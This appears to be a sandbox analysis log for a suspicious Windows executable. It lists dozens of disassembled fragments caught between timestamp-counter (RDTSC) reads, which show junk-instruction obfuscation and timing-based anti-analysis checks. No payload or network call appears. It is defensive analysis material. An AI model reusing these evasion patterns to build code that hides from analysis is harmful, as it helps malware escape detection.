Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3C4CA second address: F3C4CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3C4CE second address: F3C4DD instructions: 0x00000000 rdtsc 0x00000002 ja 00007FAD4CB4B576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3C4DD second address: F3C4E9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3C63D second address: F3C654 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jc 00007FAD4CB4B576h 0x0000000b jmp 00007FAD4CB4B57Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3C654 second address: F3C67A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop ebx 0x0000000d jmp 00007FAD4CB7C009h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3C67A second address: F3C68F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAD4CB4B581h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3CAEE second address: F3CAF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F3CAF4 second address: F3CAFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F431F0 second address: F431F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F431F6 second address: F431FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F48202 second address: F48208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F485D9 second address: F485FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB4B589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F48755 second address: F48759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F48759 second address: F48778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B586h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4AEEB second address: F4AEFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4B742 second address: F4B746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4BB69 second address: F4BB6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4BB6D second address: F4BB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4BC34 second address: F4BC7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FAD4CB7BFF8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov esi, dword ptr [ebp+122D3A67h] 0x0000002b mov dword ptr [ebp+122D2A31h], eax 0x00000031 nop 0x00000032 pushad 0x00000033 jc 00007FAD4CB7BFF8h 0x00000039 pushad 0x0000003a popad 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4BE98 second address: F4BE9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4BF5B second address: F4BF68 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAD4CB7BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4C172 second address: F4C177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4C6E2 second address: F4C6FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAD4CB7C002h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F4F76D second address: F4F772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F501A7 second address: F501B1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F52BC9 second address: F52BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F54F8F second address: F54F93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F54F93 second address: F55026 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007FAD4CB4B576h 0x0000000d jmp 00007FAD4CB4B581h 0x00000012 popad 0x00000013 popad 0x00000014 nop 0x00000015 push 00000000h 0x00000017 push ebx 0x00000018 call 00007FAD4CB4B578h 0x0000001d pop ebx 0x0000001e mov dword ptr [esp+04h], ebx 0x00000022 add dword ptr [esp+04h], 0000001Ch 0x0000002a inc ebx 0x0000002b push ebx 0x0000002c ret 0x0000002d pop ebx 0x0000002e ret 0x0000002f stc 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push edx 0x00000035 call 00007FAD4CB4B578h 0x0000003a pop edx 0x0000003b mov dword ptr [esp+04h], edx 0x0000003f add dword ptr [esp+04h], 0000001Bh 0x00000047 inc edx 0x00000048 push edx 0x00000049 ret 0x0000004a pop edx 0x0000004b ret 0x0000004c jbe 00007FAD4CB4B580h 0x00000052 jmp 00007FAD4CB4B57Ah 0x00000057 mov dword ptr [ebp+122D2838h], ecx 0x0000005d push 00000000h 0x0000005f clc 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 jp 00007FAD4CB4B57Ch 0x00000069 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F55026 second address: F55046 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FAD4CB7BFFEh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F55046 second address: F5504A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F55256 second address: F5525B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F563D0 second address: F563D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F571B5 second address: F571C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FAD4CB7BFF6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F571C0 second address: F571C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F57305 second address: F57316 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAD4CB7BFFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F590C2 second address: F590D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F57316 second address: F5739C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jne 00007FAD4CB7C004h 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FAD4CB7BFF8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f push edx 0x00000030 movzx edi, si 0x00000033 pop ebx 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push 00000000h 0x0000003d push ecx 0x0000003e call 00007FAD4CB7BFF8h 0x00000043 pop ecx 0x00000044 mov dword ptr [esp+04h], ecx 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc ecx 0x00000051 push ecx 0x00000052 ret 0x00000053 pop ecx 0x00000054 ret 0x00000055 xor dword ptr [ebp+122D2937h], ebx 0x0000005b mov eax, dword ptr [ebp+122D01E9h] 0x00000061 cmc 0x00000062 push FFFFFFFFh 0x00000064 mov ebx, dword ptr [ebp+122D38FFh] 0x0000006a nop 0x0000006b push ecx 0x0000006c pushad 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F590D0 second address: F590D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5739C second address: F573A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F590D4 second address: F590DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F573A2 second address: F573AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F590DA second address: F59146 instructions: 0x00000000 rdtsc 0x00000002 js 00007FAD4CB4B57Ch 0x00000008 jnl 00007FAD4CB4B576h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007FAD4CB4B578h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 0000001Bh 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b sub dword ptr [ebp+12460019h], eax 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D1F0Fh], ecx 0x0000003b xchg eax, esi 0x0000003c push eax 0x0000003d push esi 0x0000003e jmp 00007FAD4CB4B57Bh 0x00000043 pop esi 0x00000044 pop eax 0x00000045 push eax 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007FAD4CB4B585h 0x0000004d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F573AE second address: F573B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F59146 second address: F5914C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5914C second address: F59150 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5A051 second address: F5A0B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007FAD4CB4B578h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 adc di, 10E6h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push edx 0x00000033 call 00007FAD4CB4B578h 0x00000038 pop edx 0x00000039 mov dword ptr [esp+04h], edx 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc edx 0x00000046 push edx 0x00000047 ret 0x00000048 pop edx 0x00000049 ret 0x0000004a push eax 0x0000004b jc 00007FAD4CB4B588h 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5938B second address: F59394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5A0B2 second address: F5A0B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F59394 second address: F59398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5A1FF second address: F5A2C1 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAD4CB4B576h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b nop 0x0000000c call 00007FAD4CB4B586h 0x00000011 jmp 00007FAD4CB4B589h 0x00000016 pop edi 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push edx 0x00000021 call 00007FAD4CB4B578h 0x00000026 pop edx 0x00000027 mov dword ptr [esp+04h], edx 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc edx 0x00000034 push edx 0x00000035 ret 0x00000036 pop edx 0x00000037 ret 0x00000038 mov dword ptr [ebp+124595E7h], eax 0x0000003e mov dword ptr fs:[00000000h], esp 0x00000045 cmc 0x00000046 mov eax, dword ptr [ebp+122D0F8Dh] 0x0000004c mov bx, di 0x0000004f push FFFFFFFFh 0x00000051 push 00000000h 0x00000053 push ecx 0x00000054 call 00007FAD4CB4B578h 0x00000059 pop ecx 0x0000005a mov dword ptr [esp+04h], ecx 0x0000005e add dword ptr [esp+04h], 0000001Dh 0x00000066 inc ecx 0x00000067 push ecx 0x00000068 ret 0x00000069 pop ecx 0x0000006a ret 0x0000006b jo 00007FAD4CB4B57Ch 0x00000071 adc edi, 44879CF3h 0x00000077 xor bh, 00000077h 0x0000007a push eax 0x0000007b jns 00007FAD4CB4B584h 0x00000081 push eax 0x00000082 push edx 0x00000083 jnp 00007FAD4CB4B576h 0x00000089 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5F090 second address: F5F095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5F095 second address: F5F0B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAD4CB4B57Eh 0x00000008 jg 00007FAD4CB4B576h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 jnc 00007FAD4CB4B576h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5F0B9 second address: F5F0BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5D346 second address: F5D36C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 js 00007FAD4CB4B585h 0x0000000b jmp 00007FAD4CB4B57Fh 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jbe 00007FAD4CB4B578h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5E295 second address: F5E299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5F0BD second address: F5F0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5E299 second address: F5E29D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5F0C7 second address: F5F0CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5F2BB second address: F5F2C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jo 00007FAD4CB7BFFCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F5F2C8 second address: F5F2D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F601D3 second address: F601D9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F61ED5 second address: F61F59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FAD4CB4B586h 0x0000000c nop 0x0000000d sub dword ptr [ebp+122D2E6Dh], ebx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007FAD4CB4B578h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 0000001Dh 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebx 0x00000034 call 00007FAD4CB4B578h 0x00000039 pop ebx 0x0000003a mov dword ptr [esp+04h], ebx 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc ebx 0x00000047 push ebx 0x00000048 ret 0x00000049 pop ebx 0x0000004a ret 0x0000004b jmp 00007FAD4CB4B580h 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push ecx 0x00000054 jnl 00007FAD4CB4B576h 0x0000005a pop ecx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6207F second address: F6208B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6208B second address: F62091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F69891 second address: F698A9 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAD4CB7BFF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnc 00007FAD4CB7BFFEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F698A9 second address: F698AE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6D0F9 second address: F6D111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB7C004h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6C83B second address: F6C840 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CB20 second address: F6CB28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CB28 second address: F6CB2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CB2C second address: F6CB3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jc 00007FAD4CB7BFF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CC88 second address: F6CC8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CC8C second address: F6CC92 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CC92 second address: F6CC9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CC9B second address: F6CCAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F6CCAB second address: F6CCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAD4CB4B588h 0x00000009 je 00007FAD4CB4B576h 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F72819 second address: F72823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FAD4CB7BFF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\xdeRtWCeNH.exeRDTSC instruction interceptor: First address: F78481 second address: F78485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
